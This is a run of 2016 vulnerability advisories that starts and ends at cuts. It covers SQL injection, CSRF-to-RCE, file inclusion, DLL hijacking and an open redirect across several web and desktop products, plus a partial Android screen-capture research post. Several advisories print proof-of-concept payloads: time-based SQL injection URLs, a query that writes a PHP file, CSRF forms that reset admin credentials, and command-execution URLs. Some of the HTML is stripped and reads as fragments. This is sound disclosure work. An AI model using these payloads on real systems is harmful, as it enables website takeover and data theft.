application is run without elevated privileges. 03/07/2016 - Vendor requests a screenshot. 12/07/2016 - Provided the vendor with a video file. 12/07/2016 - Vendor replies that the issue is fixed for the next release. The vendor notes that the issue is not considered a security issue, because RLM should never be run as a privileged user. 13/07/2016 - Clarified to the vendor that the issue is indeed seen as a security issue and elaborated further on the reasons. Requested fix date and set release of the Secunia Advisory SA71200 to 22nd July 2016. 19/07/2016 - The vendor informs us that the issue will be fixed in the time frame between now and until the end of the year. 22/07/2016 - Release of Secunia Advisory SA71200. 25/07/2016 - Public disclosure of Research Advisory. == 6) Credits Discovered by Behzad Najjarpour Jabbari, Secunia Research at Flexera Software. == 7) References Currently no CVE identifier is assigned. == 8) About Secunia (now part of Flexera Software) In September 2015, Secunia has been acquired by Flexera Software: https://secunia.com/blog/435/ Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/products/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the secu
Secunia Research: Reprise License Manager "actserver" Buffer Overflow Vulnerability
== Secunia Research 25/07/2016 Reprise License Manager "actserver" Buffer Overflow Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerabilities...3 Solution.4 Time Table...5 Credits..6 References...7 About Secunia8 Verification.9 == 1) Affected Software * Reprise License Manager version 12.0BL2. Other versions may also be affected. == 2) Severity Rating: Moderately critical Impact: System compromise Where: From local network == 3) Description of Vulnerabilities Secunia Research have discovered a vulnerability in Reprise License Manager (RLM), which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to a boundary error when handling the "actserver" POST parameter related to /goform/activate_doit, which can be exploited to cause a stack-based buffer overflow via a specially crafted HTTP request. Successful exploitation of the vulnerability may allow execution of arbitrary code. == 4) Solution Update to version 12.1BL2 if available for the supported platforms. == 5) Time Table 01/06/2016 - Initial contact with vendor. 01/06/2016 - Vendor responds with service ticket ID. 02/06/2016 - Details transferred. 02/06/2016 - Vendor confirms reception and informs that the issues will be fixed in version 12.1. 28/06/2016 - Release of vendor patch. 30/06/2016 - Release of Secunia Advisory SA67000, which includes one of the vulnerabilities that is confirmed fixed. 25/07/2016 - Public disclosure of Research Advisory. == 6) Credits Discovered by Behzad Najjarpour Jabbari, Secunia Research at Flexera Software. == 7) References Currently no CVE identifier is assigned. == 8) About Secunia (now part of Flexera Software) In September 2015, Secunia has been acquired by Flexera Software: https://secunia.com/blog/435/ Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/products/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/company/jobs/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2016-7/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
BFS-SA-2016-003: Huawei HiSuite Insecure Service Directory ACLs
Vendor: Huawei, www.huawei.com Affected Product: HiSuite for Windows Affected Version: <= 4.0.3.301 CVE ID: CVE-2016-5821 OVE ID: OVE-20160624-0001 Severity: High Author: Benjamin Gnahm (@mitp0sh), Blue Frost Security GmbH Title: Huawei HiSuite Insecure Service Directory ACLs A privilege escalation vulnerability was identified in the Huawei HiSuite software which can be used by a local user to elevate privileges to become the SYSTEM user. The root cause of the problem are insecure ACLs on the HandSet service directory which allows any authenticated user to place a crafted DLL file in that directory to perform a DLL hijacking attack. Huawei has released software updates to address the issue. The full advisory with technical details is available at the following link: https://labs.bluefrostsecurity.de/advisories/bfs-sa-2016-003/
SQL Injection in GLPI
Advisory ID: HTB23301 Product: GLPI Vendor: INDEPNET Vulnerable Version(s): 0.90.2 and probably prior Tested Version: 0.90.2 Advisory Publication: April 8, 2016 [without technical details] Vendor Notification: April 8, 2016 Vendor Patch: April 11, 2016 Public Disclosure: April 29, 2016 Vulnerability Type: SQL Injection [CWE-89] Risk Level: High CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered a high-risk SQL injection vulnerability in a popular Information Resource Manager (IRM) system GLPI. IRM systems are usually used for management and audit of software packages, providing ITIL-compliant service desk. The vulnerability allows remote non-authenticated attacker to execute arbitrary SQL queries, read and write data to the application's database and completely compromise the vulnerable system. The vulnerability exists due to insufficient filtration of user-supplied data passed via the "page_limit" HTTP GET parameter to "/ajax/getDropdownConnect.php" PHP script. A remote unauthenticated attacker can alter present SQL query, inject and execute arbitrary SQL command in application's database. Below is a simple SQL Injection exploit, which uses time-based exploitation technique. The page will load time will be significantly higher if MySQL version is 5.X or superior: http://[host]/ajax/getDropdownConnect.php?fromtype=Computer=Computer=1_limit=1%20PROCEDURE%20analyse%28%28select%20extractvalue%28rand%28%29,concat%280x3a,%28IF%28MID%28version%28%29,1,1%29%20LIKE%205,%20BENCHMARK%28500,SHA1%281%29%29,1%29%29%29%29%29,1%29 --- Solution: Update to GLPI 0.90.3 More Information: http://www.glpi-project.org/spip.php?page=annonce_breve=358=en https://github.com/glpi-project/glpi/issues/581 --- References: [1] High-Tech Bridge Advisory HTB23301 - https://www.htbridge.com/advisory/HTB23301 - SQL Injection in GLPI. [2] GLPI - http://www.glpi-project.org - GLPI is the Information Resource Manager with an additional Administration Interface. [3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance. [5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
RCE via CSRF in phpMyFAQ
Advisory ID: HTB23300 Product: phpMyFAQ Vendor: http://www.phpmyfaq.de Vulnerable Version(s): 2.8.26, 2.9.0-RC2 and probably prior Tested Version: 2.8.26, 2.9.0-RC2 Advisory Publication: March 30, 2016 [without technical details] Vendor Notification: March 30, 2016 Vendor Patch: April 11, 2016 Public Disclosure: April 20, 2016 Vulnerability Type: Cross-Site Request Forgery [CWE-352] Risk Level: High CVSSv3 Base Score: 8.8 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered a high-risk security vulnerability in a popular multilingual FAQ software phpMyFAQ. A remote attacker can execute arbitrary PHP code on vulnerable system via CSRF attack against website administrator and completely compromise vulnerable web application. The vulnerability exists due to application does not properly verify origin of HTTP requests in "Interface Translation" functionality. A remote unauthenticated attacker can create a specially crafted malicious web page with CSRF exploit, trick a logged-in administrator to visit the page, spoof the HTTP request, as if it was coming from the legitimate user, inject and execute arbitrary PHP code on the target system with privileges of the webserver. A simple CSRF exploit below can be used to inject "phpinfo()" PHP function into file "/lang/language_af.php": http://[host]/admin/index.php?action=ajax=trans=save_added_trans; method="POST" name="main"> document.main.submit(); To trigger the execution of "phpinfo()", just open the following file in your browser (no privileges required): http://[host]/; method="POST"> --- Solution: Update to phpMyFAQ 2.8.27 or 2.9.0-RC3 More Information: http://www.phpmyfaq.de/security/advisory-2016-04-11 --- References: [1] High-Tech Bridge Advisory HTB23300 - https://www.htbridge.com/advisory/HTB23300 - RCE via CSRF in phpMyFAQ [2] phpMyFAQ - http://www.phpmyfaq.de - Open Source FAQ software [3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance. [5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Securing Android Applications from Screen Capture
Original here: https://blog.nightwatchcybersecurity.com/research-securing-android-applications-from-screen-capture-8dce2c8e21d#.bw2qwe213 Research: Securing Android Applications from Screen Capture SummaryTL, DR Apps on Android and some platform services are able to capture other appss screens by using MediaProjection API. Because of the way this API implements securing sensitive screens, there exist some possible security issues. The best way to secure your Android app is to use FLAG_SECURE on sensitive screens and DO NOT use the virtual keyboard (here is why). MediaProjection API Since Android 5.0, there exists a new MediaProjection API that allows apps to record videos and take screenshots of screens belonging to other apps. The API is described as follows: Android 5.0 lets you add screen capturing and screen sharing capabilities to your app with the new android.media.projection APIs. This functionality is useful, for example, if you want to enable screen sharing in a video conferencing app. The new createVirtualDisplay() method allows your app to capture the contents of the main screen (the default display) into a Surface object, which your app can then send across the network. The API only allows capturing non-secure screen content, and not system audio. To begin screen capturing, your app must first request the users permission by launching a screen capture dialog using an Intent obtained through the createScreenCaptureIntent() method. (On Android versions prior to 5, there are other methods such as undocumented APIs, and ADB, we are focusing on Android 5+) This API also drives several other functions in the OS: - Recent apps screenshots - Pinning - Casting to other displays - Google Play Games, video recording feature - Taking screenshots All of these functions as well as the MediaProjection API can take screenshots and videos of other apps. For apps to use the API, special permission is required, for platform features, no special permission is needed. Additionally, any applications signed by the system key (Google apps) can use this API without permission as well. A good open source example of an application that uses the API can be found here: https://github.com/JakeWharton/Telecine Secure and non-secure content As mentioned in the Google docs above, the API only allows capturing non-secure screen content. What exactly is secure and non-secure content? This refers to a special flag which can be applied to views in Android, called FLAG_SECURE. It is described in Android docs as follows: Treat the content of the window as secure, preventing it from appearing in screenshots or from being viewed on non-secure displays Setting this flag on Android view will prevent screenshots from being taken manually, and any other app or platform service will show a black screen. This functionality is not global for the entire app, but can be set on specific screens which can be more sensitive, and not set on others. There is no other way or permission that can mark an entire app or any part of it from being excepted from screen capture or recording. NOTE: Even on views marked with FLAG_SECURE, the virtual keyboard is ALWAYS visible. This is due to a known Android bug which Google has so far refused to fix: https://code.google.com/p/android/issues/detail?id=129285 How screen capture really works in Android The term secure as used in this context does not mean that the content of the app cannot be captured, rather that it cannot be viewed on non-secure displays. This is because screen capture and the concept of secure / non-secure isnt what developers may think it is. Behind the scenes, this API and related platform services use the concept of Casting (similar to AirPlay). Apps that capture screenshots and record videos, must create a virtual display to which then the device content is cast to. The FLAG_SECURE flag is also not used for security but rather means copyrighted content in context of DRM and displaysi.e. secure content would be something like a DVD, and a secure display would be an HDTV. This is clear on the device itselfwhen an app begins to record the screen, the cast icon is turned on in the notification bar. This is also clear from the Android source code and this doc: Display flag: Indicates that the display has a secure video output and supports compositing secure surfaces. If this flag is set then the display device has a secure video output and is capable of showing secure surfaces. It may also be capable of showing protected buffers. If this flag is not set then the display device may not have a secure video output; the user may see a blank region on the screen instead of the contents of secure surfaces or protected buffers. That would means that an Android device casting to a DRM-protected display like a TV would always display sensitive screens, since the concept of secure really means copyrighted. For apps
Open redirect on Google.com
Overview An open redirect is operating at www.google.com Details Googles main website provides a subsite for displaying mobile-optimized pages published using a special subset of HTML called AMP. While this works for mobile devices, for non-mobile devices, this redirects to the original site, thus resulting in an open redirect. The subsite operates at the following URL: https://www.google.com/amp/ where is the URL of the site. Here is an example of a legit URLin mobile browsers this would display the actual article (this can simulated using Chromes developer tools): https://www.google.com/amp/www.usatoday.com/story/life/people/2016/03/31/world-famous-architect-zaha-hadid-dies-age-65/82466082/ HOWEVER, on non-mobile devices this would redirect to: http://www.usatoday.com/story/life/people/2016/03/31/world-famous-architect-zaha-hadid-dies-age-65/82466082/ Because the vendor accepts any site without whitelist, this can be used as an open redirect. Additionally, since this is hosted on the same main domain as the search engine, it can in theory be used to drive XSS or other similar attacks, although this is mitigated by the fact that AMP currently does not allow Javascript. Vendor Response The vendor communicated that they do not consider open redirects to be a security issue References Google Security CID: 7262311032 AMP site: https://www.ampproject.org/ Vendors view on open directs: https://sites.google.com/site/bughunteruniversity/nonvuln/open-redirect Timeline 20160407: Vendor notified 20160407: Vendor response 20160411: Public disclosure
SQL Injection in SocialEngine
Advisory ID: HTB23286 Product: SocialEngine Vendor: Webligo Vulnerable Version(s): 4.8.9 and probably prior Tested Version: 4.8.9 Advisory Publication: December 21, 2015 [without technical details] Vendor Notification: December 21, 2015 Public Disclosure: April 6, 2016 Vulnerability Type: SQL Injection [CWE-89] Risk Level: High CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L] Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered SQL-Injection vulnerability in a popular social networking software SocialEngine. The vulnerability can be exploited to gain access to potentially sensitive information in database and compromise the entire website. The vulnerability exists due to insufficient filtration of input data passed via the "orderby" HTTP GET parameter to "/index.php" script. A remote unauthenticated attacker can modify present query and execute arbitrary SQL commands in application's database. A simple exploit below uses time-based SQL injection technique to demonstrate existence of the vulnerability. The following HTTP request will make page render for 99 seconds, if MySQL server version is is equal "5": http://[host]/blogs/?category=0_date==1%20AND%20%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%28IF%28MID%28version%28%29,1,1%29%20LIKE%205,99,0%29%29%29%29MTeU%29 --- Solution: Update to SocialEngine 4.8.10 More Information: http://blog.socialengine.com/2016/01/20/socialengine-php-4-8-10-is-released/ --- References: [1] High-Tech Bridge Advisory HTB23286 - https://www.htbridge.com/advisory/HTB23286 - SQL Injection in SocialEngine [2] SocialEngine - http://www.socialengine.com/ - SocialEngine is PHP community software that helps you build your own custom social network website. Advanced social networking features include blogs, photo albums, user groups and forums, providing complete control over the layout and functionality of your social network, community, forum, or portal. [3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance. [5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Multiple Vulnerabilities in CubeCart
Advisory ID: HTB23298 Product: CubeCart Vendor: CubeCart Limited Vulnerable Version(s): 6.0.10 and probably prior Tested Version: 6.0.10 Advisory Publication: March 2, 2016 [without technical details] Vendor Notification: March 2, 2016 Vendor Patch: March 16, 2016 Public Disclosure: March 30, 2016 Vulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352] Risk Level: Medium CVSSv3 Base Scores: 6.6 [CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H], 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N], 4.7 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:L] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in popular open source shopping software CubeCart. The discovered vulnerabilities allow a remote attacker to compromise vulnerable website and its databases, and conduct sophisticated attacks against its users. 1) SQL Injection in CubeCart The vulnerability exists due to insufficient filtration of user-supplied data passed via "char" HTTP GET parameter to "/admin.php" PHP script. A remote authenticated attacker with privileges to view list of products can alter present SQL query, inject and execute arbitrary SQL commands in the application's database. This vulnerability can be also exploited by anonymous attacker via CSRF vector. A simple CSRF exploit below will create a PHP file "/var/www/site/file.php" (assuming MySQL has writing permissions to this directory), which can execute phpinfo() function: http://[host]/admin.php?_g=products_id=1[updated]=DESC=T]%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,'',1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8%20INTO%20OUTFILE%20'/var/www/site/file.php'%20--%202"> 2) Stored Cross-Site Scripting in CubeCart The vulnerability exists due to insufficient filtration of user-supplied input passed via "first_name" and "last_name" HTTP POST parameters to "/index.php" script. A remote authenticated attacker can edit his or her profile, permanently inject malicious HTML and JavaScript code and execute it in administrator's browser in context of vulnerable website, when the "Customer List" page is viewed. Exploitation of this vulnerability requires the attacker to have valid user credentials, however registration is open by default. Successful exploitation of this vulnerability may allow a remote attacker to gain complete control over the web application once the logged-in administrator just visits "Customer List" page. This vulnerability can also be used to perform drive-by-download or spear-phishing attacks against. To reproduce the vulnerability, log in to the website with privileges of a regular user and use the exploit below to modify "First" and "Last name" in attacker's profile: http://[host]/index.php?_a=profile; method="POST" name="f1"> document.f1.submit(); A JS popup with "ImmuniWeb" word will be displayed, when the website administrator visits the "Customer List" page: http://[host]/admin.php?_g=customers 3) Cross-Site Request Forgery in CubeCart The vulnerability exists due to insufficient validation of HTTP request origin, when deleting local files. A remote unauthenticated attacker can create a specially crafted malicious web page with CSRF exploit, trick a logged-in administrator to visit the page, spoof the HTTP request, as if it was coming from the legitimate user, and delete arbitrary file on the system. A simple exploit below will delete file "/index.php". To reproduce the vulnerability, just log in as an administrator and visit the link below: http://[host]/admin.php?_g=maintenance=index=../index.php --- Solution: Update to CubeCart 6.0.11 More Information: https://forums.cubecart.com/topic/51079-cubecart-6011-released/ --- References: [1] High-Tech Bridge Advisory HTB23298 - https://www.htbridge.com/advisory/HTB23298 - Multiple Vulnerabilities in CubeCart [2] CubeCart - https://www.cubecart.com/ - CubeCart is a free responsive open source PHP ecommerce software system. [3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitorin
Remote Code Execution via CSRF in iTop
Advisory ID: HTB23293 Product: iTop Vendor: Combodo Vulnerable Version(s): 2.2.1 and probably prior Tested Version: 2.2.1 Advisory Publication: February 10, 2016 [without technical details] Vendor Notification: February 10, 2016 Vendor Patch: February 11, 2016 Public Disclosure: March 18, 2016 Vulnerability Type: Cross-Site Request Forgery [CWE-352] Risk Level: High CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered a Remote Code Execution vulnerability in iTop that is exploitable via Cross-Site Request Forgery flaw that is also present in the application. The vulnerability exists due to absence of validation of HTTP request origin in "/env-production/itop-config/config.php" script, as well as lack of user-input sanitization received via "new_config" HTTP POST parameter. A remote unauthenticated attacker can perform CSRF attack and execute arbitrary PHP code on the vulnerable system with privileges of the web server. Successful exploitation of the vulnerability may allow an attacker to execute arbitrary system commands on the web server, gain complete access to vulnerable web application and its databases that may contain very sensitive information. The attacker shall create a malicious web page with CSRF exploit code, trick a logged-in administrator to visit the page, spoof the HTTP request as if it was coming from the legitimate user, and permanently inject malicious PHP code into iTop configuration file. CSRF exploit will inject the following PHP code into iTop configuration file: To reproduce the vulnerability, just create an empty HTML file and paste the following CSRF exploit code into it: http://[host]/env-production/itop-config/config.php?c%5Bmenu%5D=ConfigEditor; method="post" name="main"> Then login to iTop website with admin account and open the file in your browser. After successful exploitation an attacker can run arbitrary system commands using the "/pages/UI.php" script. This simple PoC will execute "/bin/ls" directory listing command: http://[host]/pages/UI.php?cmd=ls --- Solution: Replace the file datamodels/2.x/itop-config/config.php by the version from the appropriate revision from SVN, then run the setup again. More Information: https://sourceforge.net/p/itop/tickets/1202/ --- References: [1] High-Tech Bridge Advisory HTB23293 - https://www.htbridge.com/advisory/HTB23293 - RCE via CSRF in iTop [2] iTop - http://www.combodo.com - iTop: open source ITIL ITSM Software. [3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance. [5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Admin Password Reset & RCE via CSRF in Dating Pro
Advisory ID: HTB23294 Product: Dating Pro Vendor: DatingPro Vulnerable Version(s): Genie (2015.7) and probably prior Tested Version: Genie (2015.7) Advisory Publication: February 10, 2016 [without technical details] Vendor Notification: February 10, 2016 Vendor Patch: February 29, 2016 Public Disclosure: March 18, 2016 Vulnerability Type: Cross-Site Request Forgery [CWE-352] Risk Level: Critical CVSSv3 Base Scores: 8.8 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H], 9.6 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple Cross-Site Request Forgery (CSRF) vulnerabilities in a popular dating social network Dating Pro. A remote unauthenticated attacker can perform CSRF attacks to change administrator’s credentials and execute arbitrary system commands. Successful exploitation of the vulnerability may allow attacker to gain complete control over the vulnerable website, all its users and databases. 1) CSRF in "/admin/ausers/index" The vulnerability exists due to the absence of validation of HTTP request origin in "/admin/ausers/index" script. A remote unauthenticated attacker can create a specially crafted malicious web page with CSRF exploit, trick a logged-in administrator to visit the page, spoof the HTTP request as if it was coming from the legitimate user, and change login, email address and password of the current website administrator. This means a total takeover of the website. A simple CSRF exploit below will change login, email and password to "admin", "ad...@mail.com" and "123456" respectively. To reproduce the vulnerability, just create an empty HTML file, paste the CSRF exploit code into it, login to iTop website and open the file in your browser: http://[host]/admin/ausers/index; method="post" name="main"> document.main.submit(); Now you can login as administrator using the above-mentioned credentials. 2) CSRF in /admin/notifications/settings/ The vulnerability exists due to absence of validation of HTTP request origin in "/admin/notifications/settings/" script. A remote unauthenticated attacker can create a specially crafted malicious web page with CSRF exploit, trick a logged-in administrator to visit the page, spoof the HTTP request as if it was coming from the legitimate user, and execute arbitrary system commands with privileges of the web server. A simple exploit below will replace full path to sendmail program with the following "cp config.php config.txt" system command that will copy "config.php" file into "config.txt" making its content publicly accessible: http://[host]/admin/notifications/settings/; method="post" name="main"> document.main.submit(); The command will be executed the next time when any email is being sent by the vulnerable web application. It is also possible to trigger this event using the following following CSRF exploit: http://[host]/admin/notifications/settings/; method="post" name="main"> document.main.submit(); --- Solution: Update to Genie (2015.7) released after February 29, 2016. --- References: [1] High-Tech Bridge Advisory HTB23294 - https://www.htbridge.com/advisory/HTB23294 - Admin Password Reset RCE via CSRF in Dating Pro [2] Dating Pro - http://www.datingpro.com - Everything you need to start and run a dating business. [3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance. [5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
SQL Injection and RCE in WebsiteBaker
Advisory ID: HTB23296 Product: WebsiteBaker Vendor: WebsiteBaker Org e.V. Vulnerable Version(s): 2.8.3-SP5 and probably prior Tested Version: 2.8.3-SP5 Advisory Publication: February 24, 2016 [without technical details] Vendor Notification: February 24, 2016 Vendor Patch: February 26, 2016 Public Disclosure: March 18, 2016 Vulnerability Type: SQL Injection [CWE-89] Risk Level: Critical CVSSv3 Base Score: 10 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in WebsiteBaker CMS. A remote attacker will be able to read, write or modify arbitrary information in the database, gain complete control over the vulnerable web application and even the entire web server on which the application is hosted. The vulnerability exists due to insufficient filtration of user-supplied data passed via "language" HTTP POST parameter to "/account/preferences.php" PHP script. A remote authenticated attacker (the registration is open by default) can alter present SQL query, inject and execute arbitrary SQL commands in the application’s database. Successful exploitation of vulnerability requires that the attacker is registered and authenticated, but the registration is open by default. The following exploit code will assign administrative privileges to attacker’s account. To reproduce the vulnerability, just login to the website, copy-paste the code below into an empty HTML file and then open it in your browser: http://[host]/account/preferences.php; method="post" name="f1"> document.f1.submit(); We also attract your attention, that website administrator can edit the "intro.php" file and inject arbitrary PHP code into it using the following URL: http://[host]/admin/pages/intro.php The injected code will be executed every time the user visits the following page: http://[host]/pages/intro.php Giving these circumstances, successful exploitation of SQL injection vulnerability will lead to Remote Code Execution and full compromise not just of the website, but of the entire web server and related environment. --- Solution: Update to WebsiteBaker 2.8.3 SP6 RC3.0 More Information: http://addon.websitebaker.org/pages/en/browse-add-ons.php?id=06C9F242 --- References: [1] High-Tech Bridge Advisory HTB23296 - https://www.htbridge.com/advisory/HTB23296 - SQL Injection and RCE in WebsiteBaker [2] WebsiteBaker - http://websitebaker.org - WebsiteBaker helps you to create the website you want: A free, easy and secure, flexible and extensible open source content management system (CMS). [3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance. [5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
RCE via CSRF in osCommerce
Advisory ID: HTB23284 Product: osCommerce Vendor: osCommerce Vulnerable Version(s): 2.3.4 and probably prior Tested Version: 2.3.4 Advisory Publication: December 21, 2015 [without technical details] Vendor Notification: December 21, 2015 Public Disclosure: February 17, 2016 Vulnerability Type: PHP File Inclusion [CWE-98] Risk Level: Medium CVSSv3 Base Score: 5.8 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L] Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in popular e-commerce software osCommerce with 280,000 store owners (according to the vendor). The vulnerability can be exploited to execute arbitrary PHP code on the remote system, compromise the vulnerable web application, its database and even the web server and related environment. Successful exploitation of the vulnerability requires attacker to access to administrative panel, however it can also be successfully exploited by remote non-authenticated attacker via CSRF vector to which the application is also vulnerable. The vulnerability exists due to insufficient filtration of "directory" HTTP POST parameter paassed to "/admin/languages.php" PHP script. A remote attacker can use path traversal sequences (e.g. "../../") to include and execute arbitrary PHP file from local server file system. A simple CSRF exploit below will update application database and insert "/tmp/file" value string into web application configuration: http://[HOST]/admin/languages.php?action=insert; method="post" name="main"> document.main.submit(); Then, in order to execute the PHP code from "/tmp/file" file, just open the following URL: http://[host]/index.php?language=vu --- Solution: Disclosure timeline: 2015-12-21 Vendor notified via emails, no reply. 2016-01-06 Vendor notified via emails and forum, no reply. 2016-01-13 Fix Requested via emails, no reply. 2016-01-19 Fix Requested via emails, no reply. 2016-02-17 Public disclosure. Currently we are not aware of any official solution for this vulnerability. --- References: [1] High-Tech Bridge Advisory HTB23284 - https://www.htbridge.com/advisory/HTB23284 - RCE via CSRF in osCommerce [2] osCommerce - http://www.oscommerce.com/ - osCommerce Online Merchant is a complete self-hosted online store solution that contains both a catalog frontend and an administration tool backend which can be easily installed and configured through a web-based installation procedure. [3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance. [5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
SSO Authentication Bypass and Website Takeover in DOKEOS
Advisory ID: HTB23289
Product: DOKEOS
Vendor: DOKEOS
Vulnerable Version(s): ce30 and probably prior
